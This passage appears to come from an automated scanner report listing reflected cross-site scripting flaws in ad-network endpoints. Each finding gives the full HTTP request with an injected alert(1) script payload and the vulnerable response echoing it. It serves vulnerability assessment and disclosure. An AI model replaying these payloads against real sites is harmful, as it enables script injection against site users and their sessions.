Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1112750384/x23f1f2c"><script>alert(1)</script>d093f0af15f/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.168. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 571f4"><script>alert(1)</script>cd3219b027d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM571f4"><script>alert(1)</script>cd3219b027d/2010DM/11781759243@x23?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM571f4"><script>alert(1)</script>cd3219b027d/2010DM/117581210/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.169. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc4e6"><script>alert(1)</script>518d6ce49b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbc4e6"><script>alert(1)</script>518d6ce49b7/11781759243@x23?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbc4e6"><script>alert(1)</script>518d6ce49b7/1996747534/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.170. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d6c"><script>alert(1)</script>77e70440218 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11781759243@x2336d6c"><script>alert(1)</script>77e70440218?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/464947510/x2336d6c"><script>alert(1)</script>77e70440218/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.171. http://ebay.adnxs.com/ttj [pt1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ebay.adnxs.com
Path:	/ttj

Issue detail

The value of the pt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320bc'-alert(1)-'47232191921 was submitted in the pt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384320bc'-alert(1)-'47232191921&pt2=0000951470&pt3=1183&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

1.172. http://ebay.adnxs.com/ttj [pt2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ebay.adnxs.com
Path:	/ttj

Issue detail

The value of the pt2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15a6a'-alert(1)-'5f2f4eb2edd was submitted in the pt2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384&pt2=000095147015a6a'-alert(1)-'5f2f4eb2edd&pt3=1183&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwu43i6gQQu43i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:34:51 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647291&Perf_Tracker_1=0000777384&Perf_Tracker_2=000095147015a6a'-alert(1)-'5f2f4eb2edd&Perf_Tracker_3=1183&imp_id=5777077306698984031&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAA
...[SNIP]...

1.173. http://ebay.adnxs.com/ttj [pt3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ebay.adnxs.com
Path:	/ttj

Issue detail

The value of the pt3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9484d'-alert(1)-'49a4b8e6987 was submitted in the pt3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384&pt2=0000951470&pt3=11839484d'-alert(1)-'49a4b8e6987&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwxI3i6gQQxI3i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P?+T?'k!>#Sc#R/_.pahEXh'cvTtWpuD_=4!=uT]=e@@#WVG93ZY4u96P7D+aP!tax]Ju:exw7qy2_^tYf4]Ks*mLs/?cJ7s(5OkFNF7RzUee7ff.clx*lGIRAg2$MyRF`BXtGX40>XC?a++^.Da3$bYGIIrIg(1hE@#:LqW#t?t5/fU+fe*QeH%EDs_I6?4YY(%]+YR<+z_`zKlZNe9rt`oUb>:fau[7cZIHG_g3=uY$Vn8QGa7bZ>98l0>?G#e>2oQfSw+%_CYI)SH>(th6H*wZ'jlrpS?-D3oG7m:6E3i1C-V6/Lu8a0)9ic+!svi3SbOWR@K@qm[Y3<Uao60GsPo#VSI>rzH'*wtSE@w9]P7GnDkd5ChirRZy]z/hEEdIV.#pX.l[.M`Y:xt*dhBwZTyVD0dqymyiGVt9JX%p[GOv?BCDIpgDKcnMq2Vk]4p.su4l[kAU#HhCFWY$[II-1ah0=>'sPu%'u!9jpej-X1ql[c]Hv%we*u(w)z!.NfM*1TN]R)fpBW12a=jT2RR>.VPit6J8Uu/JCap<-4=h-@n$`y6'#!.^ft^[Tgza()x1[6kr)xY]xd8aEAv6IWbIdu$_*8GP`NxDJhlg'LQ?5sbP>IKx-jQMmws[qwdPTV`%0/vB-p=h%JOl9]V%rn; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:35:00 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647300&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=11839484d'-alert(1)-'49a4b8e6987&imp_id=9182123578777281571&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAACMkwvS-dG1_BWHfHSmrE
...[SNIP]...

1.174. http://ev.ib-ibi.com/pibiview.js [xid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ev.ib-ibi.com
Path:	/pibiview.js

Issue detail

The value of the xid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9831'%3balert(1)//11d8f3efe69 was submitted in the xid parameter. This input was echoed as d9831';alert(1)//11d8f3efe69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pibiview.js?go=2208&pid=12&xid=f978e9b0-271c-47b8-9a97-caba692f0bb2d9831'%3balert(1)//11d8f3efe69 HTTP/1.1
Host: ev.ib-ibi.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 02:28:46 GMT
Content-Length: 791

IB_PartnerViewSetupScript=new function(){this.LoadViewScript=function(){try{var s=window.document.createElement("script");s.setAttribute("type", "text/javascript");s.setAttribute("src", "https://ev.ib
...[SNIP]...
ld(s);}catch (Error){}};
this.ProcessRequest = function(){this.LoadViewScript();};}
function IBPartner(){}
IBPartner.prototype.Go='2208';IBPartner.prototype.Xid='f978e9b0-271c-47b8-9a97-caba692f0bb2d9831';alert(1)//11d8f3efe69';IBPartner.prototype.Ida='';IBPartner.prototype.Pid='12'; IBPartner.prototype.Id1='';IBPartner.Go='2208';IBPartner.Xid='f978e9b0-271c-47b8-9a97-caba692f0bb2d9831';alert(1)//11d8f3efe69';IBPartner.Ida=
...[SNIP]...

1.175. http://event.adxpose.com/event.flow [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 5f074<script>alert(1)</script>ccdbedd4d61 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.haaretz.com%2Fnews%2Fdiplomacy-defense%2Freport-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218&uid=YpffvxtzOKuYhLCm_405295695f074<script>alert(1)</script>ccdbedd4d61&xy=0%2C0&wh=300%2C250&vchannel=1056349&cid=EPCV0111A&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CAF399AA1BA194759D134605EFF6C6D9; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 14 Feb 2011 01:37:30 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("YpffvxtzOKuYhLCm_405295695f074<script>alert(1)</script>ccdbedd4d61");

1.176. http://ib.adnxs.com/ab [cnd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6857d'-alert(1)-'6832ddace00 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=rkfhehSuCkCuR-F6FK4KQAAAAGBmZgJArkfhehSuCkCuR-F6FK4KQAqCdmWvEgIiBWHfHSmrEEKBi1hNAAAAAAQRAQC1AAAANQEAAAIAAACDaAIA0WMAAAEAAABVU0QAVVNEAKAAWALcANADyAUBAgUCAAIAAAAA4x3afwAAAAA.&tt_code=drudgereport.com&udj=uf%28%27a%27%2C+537%2C+1297648513%29%3Buf%28%27c%27%2C+5740%2C+1297648513%29%3Buf%28%27r%27%2C+157827%2C+1297648513%29%3Bppv%28783%2C+%272450541691773813258%27%2C+1297648513%2C+1298944513%2C+5740%2C+25553%29%3B&cnd=!6BUqYQjsLBCD0QkYACDRxwEo0AcxmZmZcRSuCkBCEwgAEAAYACABKP7__________wFIAFAAWNwBYABotQI.6857d'-alert(1)-'6832ddace00&referrer=http://www.drudgereport.com/&pp=TViLgQAFq_IK5TjPs25hd06kLUEGn6rqtMqyaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBsgOVgYtYTfLXFs_xlAf3wrmbC-_675oCl5_7xBrXgo-PDAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0wNTAyNzE3MDkxMjc5MzczsgEUd3d3LmRydWRnZXJlcG9ydC5jb226AQoxNjB4NjAwX2FzyAEJ2gEcaHR0cDovL3d3dy5kc